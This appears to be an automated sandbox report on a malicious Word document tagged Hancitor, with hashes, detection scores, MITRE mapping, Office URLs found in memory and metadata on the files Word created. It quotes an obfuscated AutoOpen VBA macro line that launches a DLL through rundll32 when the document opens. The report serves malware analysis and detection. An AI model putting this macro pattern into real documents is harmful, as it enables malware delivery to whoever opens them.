Analysis Report 1118_8732615.doc

Overview

General Information

Sample Name: 1118_8732615.doc
Analysis ID: 319766
MD5: 0f75ad40daec01aee7642795cc544bb3
SHA1: 76334ccc6e92d579495671de47664180517cdf05
SHA256: afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
Tags: doc, Hancitor, macros

Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Yara detected hidden Macro 4.0 in Excel
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 2440 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
1118_8732615.doc | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: 1118_8732615.doc, Virustotal: Detection: 15%
    Source: 1118_8732615.doc, ReversingLabs: Detection: 12%
    Machine Learning detection for sample
    Source: 1118_8732615.doc, Joe Sandbox ML: detected
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officeapps.live.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://settings.outlook.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://tasks.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    Document contains an embedded VBA macro which may execute processes
    Source: 1118_8732615.doc, OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
    Document contains an embedded VBA macro with suspicious strings
    Source: 1118_8732615.doc, OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
    Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function AutoOpen, String shellexecute: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL), Name: AutoOpen
    Source: 1118_8732615.doc, OLE, VBA macro line: Sub AutoOpen()
    Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function AutoOpen, Name: AutoOpen
    Source: 1118_8732615.doc, OLE indicator, VBA macros: true
    Source: classification engine, Classification label: mal64.expl.winDOC@1/7@0/0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\{23B756EC-0D85-4B59-AD8D-4A31056962F4} - OProcSessId.dat
    Source: 1118_8732615.doc, OLE indicator, Word Document stream: true
    Source: 1118_8732615.doc, OLE document summary: title field not present or empty
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File read: C:\Users\desktop.ini
    Source: 1118_8732615.doc, Virustotal: Detection: 15%
    Source: 1118_8732615.doc, ReversingLabs: Detection: 12%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Window found: window name: SysTabControl32
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Automated click: OK
    Source: Window Recorder, Window detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: 1118_8732615.doc
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match; File source: 1118_8732615.doc, type: SAMPLE

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting22 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting22 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    1118_8732615.doc | 16% | Virustotal | | Browse
    1118_8732615.doc | 12% | ReversingLabs | Script.Trojan.Wacatac |
    1118_8732615.doc | 100% | Joe Sandbox ML | |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v23EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA23EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        No contacted IP infos

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                        Analysis ID:319766
                                                                                                                                                        Start date:18.11.2020
                                                                                                                                                        Start time:16:22:59
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 9m 8s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:1118_8732615.doc
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Number of analysed new started processes analysed:34
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • GSI enabled (VBA)
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal64.expl.winDOC@1/7@0/0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .doc
                                                                                                                                                        Warnings:
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.122.171.231, 168.61.161.212, 52.109.76.6, 52.109.76.36, 52.109.12.21, 51.11.168.160, 23.210.248.85, 205.185.216.42, 205.185.216.10, 20.54.26.129, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 40.90.23.247, 40.90.23.206, 40.90.23.154, 40.90.23.153, 13.104.215.69, 13.104.215.72, 40.90.137.126, 40.90.137.127, 40.127.240.158, 51.11.168.232
                                                                                                                                                        • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolcus07.cloudapp.net, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                        Errors:
                                                                                                                                                        • Corrupt sample or wrongly selected analyzer.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        No simulations

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        No context

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASN

                                                                                                                                                        No context

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):129952
                                                                                                                                                        Entropy (8bit):5.378331924167014
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:tcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:PmQ9DQW+zBX8u
                                                                                                                                                        MD5:4C5D6BFCD462D9677EBB3EDB85DFF67B
                                                                                                                                                        SHA1:C74E656C67C9B90D62FDBDB2F38ADD48478A019B
                                                                                                                                                        SHA-256:70BC1689EBA0C8647E2E344A9E0B0A0D2BA355C564B68DEC49F820C59649A100
                                                                                                                                                        SHA-512:8A831AA4E0C172A23B9C7D852EA52C09D1C5CA3DBBDFC0FDC3275E2CA68A4F1174ECB73CA6AC306BF9C34602E4980B2BD2CCB1FE012D4FD84F54D6093A8992B0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-18T15:23:50">.. Build: 16.0.13515.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4FAE44D.emf
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):5416
                                                                                                                                                        Entropy (8bit):2.0520805575447705
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:YISOayKbfoyVbs/qpBBBBBBBUBBBBBBqBBBBBBBUBBBBBBqBBBBBBBUBBBBBBqBJ:HVmbfogbsU07wgNgXalj+JL
                                                                                                                                                        MD5:5F98F862F370C31BD4AB71F758D11B14
                                                                                                                                                        SHA1:44221D1E056B5DB2C8EF8197CDE763F194A4657C
                                                                                                                                                        SHA-256:4F529AA95102406D4A45B29D7B418D2402817795602DCAE4A5F24C95E2123568
                                                                                                                                                        SHA-512:6DBE30CBE0BAACE1FBC5804E738B8ECBB1CABFD8E90D1FC0806F4EEBD23524E1E7CDE15E33EC8CE5C77ED0D88DB47F4BD288E749B0EE3507066FFCE95A13E8B0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{58EC7C29-FC88-4CA2-A6C0-9123E4D0B0C9}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1118_8732615.doc.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Wed Nov 18 23:23:50 2020, atime=Wed Nov 18 23:23:47 2020, length=621568, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2130
                                                                                                                                                        Entropy (8bit):4.673135614679704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:83O5j/7ShIK+AkW4D/W7aB6my3O5j/7ShIK+AkW4D/W7aB6m:83onSIOkWefB6p3onSIOkWefB6
                                                                                                                                                        MD5:6276BFEA591D8E37F6133FE9552DCF60
                                                                                                                                                        SHA1:BDE7914CD7675152B412A1DF97C3D203C7D61950
                                                                                                                                                        SHA-256:542298C8D97CEFE32A72BBF0AC7098B0EDFEDF78618CC496DA4A6CF1BFDD8369
                                                                                                                                                        SHA-512:7A8E66324467B218B3F803D3FC3FD12E18D3D070C5074BFFB8F5EB49C8394CB51596E21FC224A29DE86B978FA02DFE7944C7878FDF353F2596E54CEDA82B146E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):86
                                                                                                                                                        Entropy (8bit):4.235670976640587
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:M1UUvlLBC+dclLBCmX1UUvlLBCv:Mea9py92a9s
                                                                                                                                                        MD5:F474223C2C879253F9A638B2D9E53BA6
                                                                                                                                                        SHA1:26645E4A3856BD5C8FEF7664B98E6A89E0FB20D3
                                                                                                                                                        SHA-256:6A1D2784F2E8DE87D55A5095EFE10C2B588B0E475CDDEA9F679064BACFD966DF
                                                                                                                                                        SHA-512:B113B497E5801661DEA171F60660C3A304F813A892512B70A92F1DA077096D9E175AB5CD3486809F8EC36AE557A652C34EE463D479E9A70D1D04EF51F5751DEF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: [doc]..1118_8732615.doc.LNK=0..1118_8732615.doc.LNK=0..[doc]..1118_8732615.doc.LNK=0..
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.1073706520881803
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/Zd/btMztvtlbFzflqKmyl1/5:RtZ9+zxWA1B
                                                                                                                                                        MD5:9412CC0321BD5F055E6E6356E461865C
                                                                                                                                                        SHA1:870ECAFD5EC499D628DA7C40DE5DDA7077D69B5C
                                                                                                                                                        SHA-256:695A224B4078A4C81952EDBD75B4CC015EE6E7E7B873674EF9B80CDEF9B87A59
                                                                                                                                                        SHA-512:EC88BF93954204C0A479CCE1DCFF42572FCA0C6A3EF713E35386CCAE16E554BB2CADC18E59578A23398E17418B884BB95D1F73BF2040C7C17AA15447B669C470
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........................................................H.......6C......................$...
                                                                                                                                                        C:\Users\user\Desktop\~$18_8732615.doc
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.1073706520881803
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/Zd/btMztvtlbFzflqKmyl1/5:RtZ9+zxWA1B
                                                                                                                                                        MD5:9412CC0321BD5F055E6E6356E461865C
